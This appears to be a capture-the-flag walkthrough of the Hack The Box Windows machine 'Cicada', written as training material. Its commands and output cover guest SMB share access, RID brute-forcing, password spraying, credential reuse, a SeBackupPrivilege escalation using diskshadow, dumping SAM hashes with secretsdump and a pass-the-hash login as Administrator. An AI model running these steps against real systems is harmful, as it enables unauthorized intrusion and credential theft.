Cicada

Synopsis

Cicada is a easy windows machine created by theblxckcicada. The machine has Active Directory and allows us the SMB Guest login and has a read permission in HR Share which contains the txt file. The file contains the password. The username rid-brute and password spraying is used. The password is used to authenticate into LDAP as michael.wrightson. The LDAP user enumeration reveals the david.orelious password for SMB authentication. The david.orelious has a read permission in DEV share which contains the ps1 file. The file contains the emily.oscars password. We get the user flag and shell as emily.oscars with the password. The emily.oscars has a SeBackupPrivilege which can be exploited for privilege escalation with diskshadow.exe. The sam and system registry hives is backuped. The password is dumped using impacket-secretdump, with successful exploitation we get the root flag and shell as Administrator using ntlm hash.

Difficulty

Points

Release Date

Retired Date

Windows

Easy

28-09-2024

15-02-2025

Enumeration

Nmap

Started the nmap and found the Active directory ports open. Due to some reason the service is showing the tcpwrapped.

nmap -Pn -sC -sV --min-rate=500 10.10.11.35

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 01:09 EST
Nmap scan report for cicada.htb (10.10.11.35)
Host is up (0.60s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
53/tcp   open  tcpwrapped
135/tcp  open  tcpwrapped
139/tcp  open  tcpwrapped
445/tcp  open  tcpwrapped
464/tcp  open  tcpwrapped
593/tcp  open  tcpwrapped
3268/tcp open  tcpwrapped

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-24T12:54:40
|_  start_date: N/A
|_clock-skew: 6h45m12s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.90 seconds

SMB - Guest

The SMB allows the Guest login and we have a read permissions in HR shares.

nxc smb 10.10.11.35 -u 'Guest' -p '' --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Guest: 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share

Downloading all the files from HR shares.

nxc smb 10.10.11.35 -u 'Guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Guest: 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share 
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Readable Shares:  2 (HR, IPC$)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total folders found:  0
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total files found:    1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size average:    1.24 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size min:        1.24 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size max:        1.24 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File unique exts:     1 (.txt)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Downloads successful: 1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] All files processed successfully.

The HR share contains the 'Notice from HR.txt' file and it contains the Password for joining the Cicada Corp! team.

cd /tmp/nxc_hosted/nxc_spider_plus/10.10.11.35/HR
cat Notice\ from\ HR.txt

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

Username rid-burte and Password Spraying

Getting all the usernames using --rid-brute.

nxc smb 10.10.11.35 -u 'Guest' -p '' --rid-brute
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Guest: 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)

Saved the output into the output.txt file and using grep for username filtration.

grep -oP '(?<=CICADA\\)[^ ]+' output.txt > usernames

Password Spraying the obtained password and it works on michael.wrightson user.

nxc smb 10.10.11.35 -u usernames -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\DnsUpdateProxy:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Groups:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\Dev:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

LDAP - michael.wrightson

Trying different protocol authentication and we can authenticate into LDAP protocol.

nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] Account not found in the BloodHound database.
SMB         10.10.11.35     445    CICADA-DC        [-] Error enumerating shares: The NETBIOS connection with the remote host timed out.

nxc winrm 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [-] Neo4J does not seem to be available on bolt://127.0.0.1:7687.

Bloodhound

The Bloodhound can be used to enumerate the Active Directory using nxc as a ingestor for collecting bloodhound data.

First of all lets start neo4j database.

sudo neo4j start
[sudo] password for dexter: 
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:20156). It is available at http://localhost:7474
There may be a short delay until the server is ready.

nxc ldap 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --bloodhound --collection all --dns-server 10.10.11.35
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [-] Account not found in the BloodHound database.
LDAP        10.10.11.35     389    CICADA-DC        Resolved collection methods: acl, group, localadmin, objectprops, rdp, trusts, container, dcom, session, psremote
LDAP        10.10.11.35     389    CICADA-DC        Done in 01M 52S
LDAP        10.10.11.35     389    CICADA-DC        Compressing output into /home/dexter/.nxc/logs/CICADA-DC_10.10.11.35_2024-12-24_012806_bloodhound.zip

Open the bloodhound and upload the data and while enumerating the user, found the david.orelious password in his description. The below query is used for listing all the user.

MATCH(u:User) RETURN u

Alternatively we can use ldapsearch or nxc with -users flag for user enumeration without using bloodhound.

Foothold

SMB - david.orelious

The password can be used in SMB authentication and downloaded all the files from the share.

nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3'                                     
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB         10.10.11.35     445    CICADA-DC        Node DAVID.ORELIOUS@CICADA.HTB successfully set as owned in BloodHound

nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -M spider_plus -o DOWNLOAD_FLAG=True
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.35.json".
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Shares:           7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Readable Shares:  5 (DEV, HR, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total folders found:  33
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Total files found:    12
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size average:    1.09 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size min:        23 B
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File size max:        5.22 KB
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] File unique exts:     6 (.pol, .txt, .ps1, .ini, .inf, .cmtx)
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [*] Downloads successful: 12
SPIDER_PLUS 10.10.11.35     445    CICADA-DC        [+] All files processed successfully.

The DEV share contains the Backup_script.ps1 file which contains the emily.oscars password.

cd /tmp/nxc_hosted/nxc_spider_plus/10.10.11.35/DEV
cat Backup_script.ps1

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Shell - emily.oscars

The password can be used in SMB and WINRM authentication.

nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt 
SMB         10.10.11.35     445    CICADA-DC        Node EMILY.OSCARS@CICADA.HTB successfully set as owned in BloodHound


nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
WINRM       10.10.11.35     5985   CICADA-DC        Node CICADA-DC.CICADA.HTB successfully set as owned in BloodHound

Getting shell using evil-winrm as emily.oscars.

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

The use flag is present in C:\Users\emily.oscars.CICADA\Desktop\user.txt 👏

Privilege Escalation

Shell - Administrator [ SeBackupPrivilege Exploit ]

Running whoami /all reveals that the user has a SeBackupPrivilege.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

The blog post is written to exploit the SeBackupPrivilege for dumping the ntlm hashes. The exploit can be found here.

Create the diskshadow.txt file in local machine and upload it into C:\Windows\Temp folder.

vi diskshadow.txt

set metadata .\tmp.cabs 
set context persistent nowriters 
add volume c: alias cdrive 
create 
expose %cdrive% h:

cd c:\Windows\Temp
upload diskshadow.txt

Run the `diskshadow.exe`

diskshadow.exe /s .\diskshadow.txt

If the diskshadow.exe has run successfully the below output will be printed, otherwise the output will be different.

*Evil-WinRM* PS C:\Windows\Temp> diskshadow.exe /s .\diskshadow. txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation

computer: CICADA-DC, 12/25/2024 12:24:02 AM

metadata .\tmp.cabs

col stent nowriters

Alias cdrive -9352-4a08-937e-d8f et as environment variable
Alias VSS_SHADOW_SET for sI w set ID {064223bf-d5e0-4e9f-aale-619af8ed770b} set as environment variable.

Querying all shadow copies with the shadow copy set ID {064223bf-d5e0-4e9f-aale-619af8ed770b}

* Shadow copy ID = {df5a3fb4-9352-4a08-937e-d8f7607 f6680} %cdrive%s
- Shadow copy set: {064223bf-d5e0-4e9f-aale-619af8ed770b} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{fcebaf9b-0000-0000-0000-500600000000}\ [C:\]
- Creation time: 12/25/2024 12:24:02 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVoLumeShadowCopy1
- Originating machine: CICADA-DC.cicada.htb
- Service machine: CICADA-DC.cicada.htb
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1

-> expose %cdrive% h

-> scdrive’s = {df5a3fb4-9352-4a08-937e-d8f7607f6680}
The shadow copy was successfully exposed as h.

Getting system registry hives and downloading it into localhost.

In the above exploit the ntds.dit is backed up but in this machine it gives us some error and I am backuping the system registry hives.

reg save HKLM\SAM .\sam
reg save HKLM\SYSTEM .\system

download sam
download system

Dump the hash and get Administrator shell using `evil-winrm`.

impacket-secretsdump -sam sam -system system LOCAL

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...

evil-winrm -i 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

The root flag is present in C:\Users\Administrator\Desktop\root.txt 🎉

Proof of Concept

The below video provides the PoC of Cicada machine.

PreviousYummy NextTrickster

Last updated 10 months ago

hashtagSynopsis

hashtagEnumeration

hashtagNmap

hashtagSMB - Guest

hashtagUsername rid-burte and Password Spraying

hashtagLDAP - michael.wrightson

hashtagBloodhound

hashtagFoothold

hashtagSMB - david.orelious

hashtagShell - emily.oscars

hashtagPrivilege Escalation

hashtagShell - Administrator [ SeBackupPrivilege Exploit ]

hashtagCreate the diskshadow.txt file in local machine and upload it into C:\Windows\Temp folder.

hashtagRun the diskshadow.exe

hashtagGetting system registry hives and downloading it into localhost.

hashtagDump the hash and get Administrator shell using evil-winrm.

hashtagProof of Concept